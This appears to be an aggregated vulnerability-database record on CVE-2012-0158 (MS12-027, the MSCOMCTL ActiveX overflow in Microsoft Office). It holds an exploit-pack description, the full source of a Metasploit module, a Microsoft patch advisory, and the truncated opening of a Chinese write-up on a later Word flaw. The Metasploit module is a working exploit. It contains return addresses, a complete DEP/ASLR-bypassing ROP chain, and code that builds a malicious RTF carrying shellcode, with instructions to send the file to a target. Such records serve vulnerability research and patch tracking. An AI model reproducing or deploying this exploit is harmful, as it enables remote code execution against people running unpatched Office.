Windows 7 English. \n \nThe Universal Windows version needs the target to have Word opened \nfor a few seconds before executing the file. \n \nUsage: \nGenerate rtf file and send to target. \n \n \nVersionsAffected: Office 2003 to Office 2010 SP1 \nRepeatability: \nMSADV: MS12-027 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-027 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 \nDate public: 04/10/2012 \nCVSS: 9.3 \n\n", "modified": "2012-04-10T21:55:00", "published": "2012-04-10T21:55:00", "id": "MS12_027", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_027", "type": "canvas", "title": "Immunity Canvas: MS12_027", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:53", "bulletinFamily": "exploit", "description": "", "modified": "2012-04-25T00:00:00", "published": "2012-04-25T00:00:00", "href": "https://packetstormsecurity.com/files/112176/MS12-027-MSCOMCTL-ActiveX-Buffer-Overflow.html", "id": "PACKETSTORM:112176", "type": "packetstorm", "title": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious \nRTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited \nin the wild on April 2012. \n \nThis module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office \n2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses \n\"msgr3en.dll\", which will load after office got load, so the malicious file must \nbe loaded through \"File / Open\" to achieve exploitation. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0158' ], \n[ 'OSVDB', '81125' ], \n[ 'BID', '52911' ], \n[ 'MSB', 'MS12-027' ], \n[ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ], \n[ 'URL', 'http://abysssec.com/files/The_Arashi.pdf' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500, \n'Space' => 900, \n'BadChars' => \"\\x00\", \n'DisableNops' => true # no need \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# winword.exe v12.0.4518.1014 (No Service Pack) \n# winword.exe v12.0.6211.1000 (SP1) \n# winword.exe v12.0.6425.1000 (SP2) \n# winword.exe v12.0.6612.1000 (SP3) \n[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Offset' => 270, \n'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45 \n'Rop' => false \n} \n], \n# winword.exe v14.0.6024.1000 (SP1) \n[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll \n'Rop' => true, \n'RopOffset' => 120 \n} \n], \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), \n], self.class) \nend \n \ndef stream(bytes) \nRex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\") \nend \n \ndef junk(n=1) \ntmp = [] \nvalue = rand_text(4).unpack(\"L\")[0].to_i \nn.times { tmp << value } \nreturn tmp \nend \n \n# Ikazuchi ROP chain (msgr3en.dll) \n# Credits to Abysssec \n# http://abysssec.com/files/The_Arashi.pdf \ndef create_rop_chain \nrop_gadgets = [ \n0x3F2CB9E0, # POP ECX # RETN \n0x3F10115C, # HeapCreate() IAT = 3F10115C \n# EAX == HeapCreate() Address \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address. \n0x3F39AFCF, # CALL EAX # RETN \n0x00040000, \n0x00010000, \n0x00000000, \n0x3F2CB9E0, # POP ECX # RETN \n0x00008000, # pop 0x00008000 into ECX \n# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap \n0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN \njunk, \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address. \n# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;) \n0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN \n0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero! \n# then we add ESP to the Zero which result in storing ESP into that address, \n# we need ESP address for copying shellcode ( which stores in Stack ), \n# and we have to get it dynamically at run-time, now with my tricky instruction, we have it! \n0x3F2F18CC, # POP EAX # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX \n# makes ECX point to nearly offset of Stack. \n0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN \n0x3F39795E, # POP EDX # RETN \n0x00000024, # pop 0x00000024 into EDX \n# add 0x24 to ECX ( Stack address ) \n0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN \njunk, \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location, \n# and the popping it into ESI ! now ESI point where shellcode stores in stack \n0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# makes EDI = Our RWX Heap Address \n0x3F2B0A7C, # XCHG EAX,EDI # RETN 4 \n0x3F2CB9E0, # POP ECX # RETN \njunk, \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# just skip some junks \n0x3F38BEFB, # ADD AL,58 # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent ) \n# Copy shellcode from stack into RWX Heap \n0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN \njunk(2), # pop into edi # pop into esi \n0x3F39AFCF # CALL EAX # RETN \n].flatten.pack(\"V*\") \n \n# To avoid shellcode being corrupted in the stack before ret \nrop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here \nreturn rop_gadgets \n \nend \n \ndef exploit \n \nret_address = stream([target.ret].pack(\"V\")) \n \nif target['Rop'] \nshellcode = stream(create_rop_chain) \nelse \n# To avoid shellcode being corrupted in the stack before ret \nshellcode = stream(make_nops(target['Offset'])) \nshellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string) \nshellcode << stream(make_nops(4)) \nend \nshellcode << stream(payload.encoded) \nwhile shellcode.length < 2378 \nshellcode += \"0\" \nend \n \ncontent = \"{\\\\rtf1\" \ncontent << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\" \ncontent << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\" \ncontent << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\" \ncontent << \"{\\\\object\\\\objocx\" \ncontent << \"{\\\\*\\\\objdata\" \ncontent << \"\\n\" \ncontent << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\" \ncontent << \"00000000000000000E0000\" \ncontent << \"\\n\" \ncontent << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\" \ncontent << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\" \ncontent << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\" \ncontent << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\" \ncontent << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\" \ncontent << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\" \ncontent << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\" \ncontent << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\" \ncontent << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\" \ncontent << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\" \ncontent << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\" \ncontent << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\" \ncontent << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\" \ncontent << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\" \ncontent << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\" \ncontent << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\" \ncontent << \"000000000000\" \ncontent << ret_address \ncontent << \"9090909090909090\" \ncontent << shellcode \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\" \ncontent << \"00000000000000\" \ncontent << \"\\n\" \ncontent << \"}\" \ncontent << \"}\" \ncontent << \"}\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(content) \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/112176/ms12_027_mscomctl_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2019-08-22T18:24:05", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves a vulnerability in MSCOMCTL.OCX could allow Remote Code Execution. This was released on April 10, 2012.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-027. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201204.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201204.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-027\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-027</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2></h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/><br/> The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/><br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/983807\" id=\"kb-link-8\">983807 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Analysis Services Service Pack 4 QFE: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983808\" id=\"kb-link-9\">983808 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 GDR: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/983809\" id=\"kb-link-10\">983809 </a> MS12-027: Description of the security update for Microsoft SQL Server 2000 Service Pack 4 QFE: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2597112\" id=\"kb-link-11\">2597112 </a> MS12-027: Description of the security update for Microsoft Office 2003 Service Pack 3: April 10, 2012<br/><br/>Known issue in security update 2597112:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598039\" id=\"kb-link-12\">2598039 </a> MS12-027: Description of the security update for Office 2010: April 10, 2012 <br/><br/>Known issue in security update 2598039:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2598041\" id=\"kb-link-13\">2598041 </a> MS12-027: Description of the security update for 2007 Microsoft Office system: April 10, 2012<br/><br/>Known issue in security update 2598041:<ul class=\"sbody-free_list\"><li>You install this security update on a computer that has a third-party software solution installed. The software solution is based on Microsoft Visual Basic for Applications (VBA). The software solution creates an instance of the control directly through Microsoft Office. In this scenario, the control may not load in your solution.<br/><br/>To resolve this issue, you must delete the cached versions of the control type libraries (extender files) on the client computer. To do this, you must search your hard disk for files that have the \".exd\" file name extension and delete all the .exd files that you find. These .exd files will be re-created automatically when you use the new controls the next time that you use VBA. These extender files will be under the user's profile and may also be in other locations, such as the following: <div class=\"indent\">C:\\documents and settings\\username\\Application Data\\Microsoft\\Forms<br/><br/>C:\\documents and settings\\username\\AppData\\Local\\Temp\\VBE</div></li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2641426\" id=\"kb-link-14\">2641426 </a> MS12-027: Description of the security update for Visual Basic 6: April 10, 2012<br/><br/>Known issue in security update 2641426:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2645025\" id=\"kb-link-15\">2645025 </a> MS12-027: Description of the security update for Microsoft BizTalk Server 2002: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2647488\" id=\"kb-link-16\">2647488 </a> MS12-027: Description of the security update for Fox Pro 8.0 Service Pack 1: April 10, 2012<br/><br/>Known issue in security update 2647488:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\"><span class=\"text-base\">Add or Remove Programs</span></strong> item or the <strong class=\"uiterm\"><span class=\"text-base\">Programs and Features</span></strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2647490\" id=\"kb-link-17\">2647490 </a> MS12-027: Description of the security update for Fox Pro 9.0 Service Pack 2: April 10, 2012<br/><br/>Known issue in security update 2647490:<ul class=\"sbody-free_list\"><li>You cannot remove this security update through the <strong class=\"uiterm\">Add or Remove Programs</strong> item or the <strong class=\"uiterm\">Programs and Features</strong> item in Control Panel.</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2655547\" id=\"kb-link-18\">2655547 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658674\" id=\"kb-link-19\">2658674 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2002: April 10, 2012 </li><li><a href=\"https://support.microsoft.com/en-us/help/2658676\" id=\"kb-link-20\">2658676 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2009 R2: April 10, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2658677\" id=\"kb-link-21\">2658677 </a> MS12-027: Description of the security update for Microsoft Commerce Server 2007: April 10, 2012<br/><br/>Known issue in security update 2658677:<ul class=\"sbody-free_list\"><li>If you uninstall this security update, the version of Mscomctrl.ocx does not roll back to the original version.</li></ul></li></ul></div></body></html>", "modified": "2012-05-23T21:51:36", "id": "KB2664258", "href": "https://support.microsoft.com/en-us/help/2664258/", "published": "2017-01-07T21:25:13", "title": "MS12-027: Vulnerability in MSCOMCTL.OCX could allow Remote Code Execution: April 10, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:21:09", "bulletinFamily": "exploit", "description": "\u6765\u6e90\uff1a http://drops.wooyun.org/papers/9809\r\n\r\n### Microsoft Office \u5185\u5b58\u635f\u574f\u6f0f\u6d1e\r\n\r\n\r\n### 0x01 \u6f0f\u6d1e\u6982\u8ff0\r\n\r\n\u4eca\u5e744\u6708\u4efd\u5fae\u8f6f\u4fee\u8865\u4e86\u4e00\u4e2a\u540d\u4e3aCVE-2015-1641\u7684word\u7c7b\u578b\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u5d4c\u5165\u4e86docx\u7684rtf\u6587\u6863\u8fdb\u884c\u653b\u51fb\u3002word\u5728\u89e3\u6790docx\u6587\u6863\u5904\u7406displacedByCustomXML\u5c5e\u6027\u65f6\u672a\u5bf9customXML\u5bf9\u8c61\u8fdb\u884c\u9a8c\u8bc1\uff0c\u53ef\u4ee5\u4f20\u5165\u5176\u4ed6\u6807\u7b7e\u5bf9\u8c61\u8fdb\u884c\u5904\u7406\uff0c\u9020\u6210\u7c7b\u578b\u6df7\u6dc6\uff0c\u5bfc\u81f4\u4efb\u610f\u5185\u5b58\u5199\u5165\uff0c\u6700\u7ec8\u7ecf\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u6807\u7b7e\u4ee5\u53ca\u5bf9\u5e94\u7684\u5c5e\u6027\u503c\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n\r\n\u6839\u636e\u5fae\u8f6f\u5b98\u65b9MS15-33\u5b89\u5168\u516c\u544a\u91cc\u663e\u793a\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u8986\u76d6Office 2007 